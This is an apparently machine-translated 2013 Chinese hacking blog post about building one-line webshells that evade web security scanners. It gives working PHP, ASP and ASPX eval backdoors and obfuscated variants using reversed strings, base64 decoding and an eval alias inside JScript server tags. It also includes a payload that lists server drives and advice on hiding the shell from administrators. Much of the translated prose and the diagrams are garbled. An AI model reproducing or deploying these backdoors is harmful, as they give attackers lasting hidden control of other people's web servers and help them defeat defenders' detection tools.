RedFree, 2013/12/30 12:04
0 x00 background
In other words, now the server security software for the detection of Web file code has been very popular, common a D protection shield, security dog, Guardian god, 360 website guard. They also have roughly the same functionality, such as:
+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- to -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | (1) check the SQL injection | | 2. Check the XSS code | | 3. Check the website of the danger of the code file | | (4) check | database permissions management, risk behavior + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- social -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | | 5. Traffic monitoring those website log management | the | | 7 system process management | | end port state view | | pet-name ruby system accounts, special location file check | | attending Ddos defense, cc attack | |... | +-------------------------------------------+Copy the codeThese functions can be categorized as follows:
+ - (testing Get content) | + - (not invasion) -- -- -- -- -- - | - (detection Post content) | | | + -- (Http request headers, request frequency, etc.) security software - | | + -- review analysis (log) | | + - (invasion) -- -- -- -- -- - | - (back-door detecting clearance) | + - (system security reinforcement)Copy the codeThis article is aimed at the situation: with Webshell (in a word) [why not Big horse, because big horse has a higher chance of being killed] successfully execute arbitrary code bypassing the detection of the website security class software.
0x01 Technical details
In order for a word to receive code, execute code, and return results, the first condition must be that a word has passed the check. All right, cut the crap and get to work!
Tools available:
D shield _Web search (D shield Shell)
ASP, ASPX, PHP original ecology pollution-free words
The < % eval request (" z ") % >. <%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe"); % >. <? php @eval($_POST['z']); ? >Copy the codeTake a look at D shield on the original sentence of the killing situation!
Shit! , level 5(Eval back door) kill all! This means that even if your words are already in the target site directory, the WAF will disconnect you when you visit it. Such a sentence is meaningless in itself, let alone used.
So what do you do in this case? My answer is: like Windows do exe not kill the same, find kill software to kill the signature code and then change or bypass. Of course, the kill-free Shell is much simpler than the kill-free EXE…
Start doing “no kill” to our phrase! Before this first to understand the principle of a word Trojan horse. Compare ASP, ASPx, and PHP in a word. What do you find?
You see, the formation of a sentence in different languages is almost exactly the same! (Request client data first, and then execute the requested data.) As for the source of execution data, it can be Post, Get, cookies, session, etc. (Still Post, Get); Of course, Post is the best method for considering data length, encoding, concealment and many other factors.
So what is the server security software to kill? Having said “features”, let’s do the following tests:
I added a random character to Request/POST and scanned it again. Visible security software to kill not eval (execute/executeglobal/assert…) Instead, eval+” Request data “. An eval string in a script is just a reminder (if you can’t execute a function, why did God make it?). . However, none of the three scripts in the figure above can be executed properly, so there is no srequest!
Does that leave us with nothing to say? The answer is no! We can make a loop as follows: [exec Decoding (excoding)]= “pseudo-code. Excoding is a native word that has been encoded. Encode and decode functions create your own…
After some work, I modified the Shell code to look like this (none of which is the best, of course, because I’m a little lazy):
ASP:
#! php <% Function MorfiCode(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Function Execute MorfiCode(")/*/z/*/(tseuqer lave") %>Copy the codeASPX:
#! php <script runat="server" language="Jscript"> function popup(str){ var q = "u"; var w = "afe"; var a = q + "ns" + w; var b = eval(str,a); return(b); } </script> <% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=" )))); % >Copy the codePHP
#! php <? php $mujj = $_POST['z']; if($mujj! ="") { $xsser = base64_decode($_POST['z0']); @eval("\$safedg = $xsser;" )}? >Copy the codeThe effect is as follows:
Actually, the connection with Shell will not be broken at this point, and the above three sentences all support our dear “kitchen knife” connection. But you can’t actually connect with a kitchen knife, because security software also detects Get, Post, Cookies… There are too many keywords (execute, Response. write,base64_decode…… Do not believe you cut the package to have a look). What is the way to break through this? Haha, two ways:
The transformation “kitchen”, the disassembly (still have characteristics) see: zone.wooyun.org/content/816… Second, oneself write a “kitchen” (can be completely without any characteristics) see: zone.wooyun.org/content/813…
Custom coding send chopper (client) after the = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = "word (server) after decoding execution returns (code) dataCopy the codeYou can now use “kitchen Knife” to manage sites with web security software, but you will still be prompted for Execute/eval/base64_decode encryption. For normal circumstances seldom useful to eval/execute/executeglobal… Function (experienced managers search eval, execute, assert, etc., and delete if it is included in <%%>) How can we trick the administrator into keeping our Shell? Of course there are answers, you can construct an injection or file upload, and then use your own Shell, but my goal is to make my sentence very confusing (dog, God, shield, guardian brother do not kill; The administrator did not recognize this as a sentence.
In this case, there may be a difficult decision to make: abandon our “kitchen knife” and write the client all by itself. All key codes such as eval are written into the tag, because security software is lax in detecting the code inside the tag. php ? > and other script markup code within the regular detection is more stringent. Things like that used to be perfect for “no-kill” are no longer available, but we still have JScript! Who would notice LANGUAGE=JAVASCRIPT?
After some modification, the final code is as follows:
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT> var P = Request.form('z'); var Wab = {'E' : eval}; Wab.E(P+''); </SCRIPT>
Copy the codeTake a look at the effect…
D shield no longer has any hints! So how do you use this sentence? I already said I can’t use “cleaver connect”. Well, try Posting a piece of code to this sentence in Firefox…
Of course, not limited to display site path, arbitrary code oh! Try:
try{var S="->|"+Server.Mappath("/")+"\t"; var oFso = Server.CreateObject("Scripting.FileSystemObject"); var oDrivers = oFso.Drives; for(var x=new Enumerator(oDrivers); ! x.atEnd(); x.moveNext()) {var oDriver = x.item(); S+=oDriver.Path; }S+="|<-"; Response.write(S); }catch(e){}Copy the code
This one sentence does everything we need, but you could say it’s still not perfect because it doesn’t support Chopper! All right, well, go ahead and remodel it… The modified Shell code is as follows:
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT> var Sp = Request.form('z'); var Fla = {'E' : eval}; Var St="" var A="; Var B="XX code "; var C="XXXXXX"; ... switch(Sp) { case "A": St=A; break; case "B": St=B; break; case "C": St=C; break; case "D": St=D; case "E": St=E; break; ... default:} Fla.E(St+''); </SCRIPT>Copy the codeThis makes it possible to use the “kitchen knife” connection (I’ve omitted the code to simplify the highlights and the above is just an example).
Well, ASP has already played a very happy sentence to this, then next talk about ASPX, PHP, is this, I do not understand.NET programming, also do not understand PHP programming. Oneself at most also calculate is a no certificate & amateur program ape, so from this go down what you can see see, can’t see hard ridicule !!!!!
In general the ASPX above words enough to play, but if you are a perfectionist, you can to compile your code into the Dll, and then put into the bin directory (lake2 N years ago did not: WebAdmin 2. See Y: blog.csdn.net/lake2/artic…). , DLL code with notepad can see it! Let alone kill…
Finally, for PHP, the morphing method is the same as ASP or ASPX. You can write code to <script language= PHP > tag to increase confusion, but this trick and ASP VBscript for security software has long been ineffective, did not say they as so, depending on the actual situation and use of the place, their choice.
This can be achieved by simple variable passing (PHP syntax is so flexible that it doesn’t even have to be a scratch)… I use the following code as a sentence:
#! php <? php $x=$_POST['z']; @eval("\$safedg = $x;" ); ? >Copy the codeOf course, if you are not satisfied, you can continue to work, even eval has been torn down! Use preg_replace, array_map, or get eval, assert from the REQUEST variable… If there is no d-shield, there will be different levels of reports (suspicious but not recognized, after all, these uncommon functions are quite risky……). I’m too lazy to have sex… See the effect:
About how to play a word has written almost (I level problems ASPX, PHP failed to write more detailed! Later…) . If you’re going to lose the ability to play a word because it’s a keyword (which is unlikely), write Customize scripts, at least to read and write files and connect to databases.
Reference:
Qqhack8.blog.163.com/blog/static…
Hi.baidu.com/monyer/item…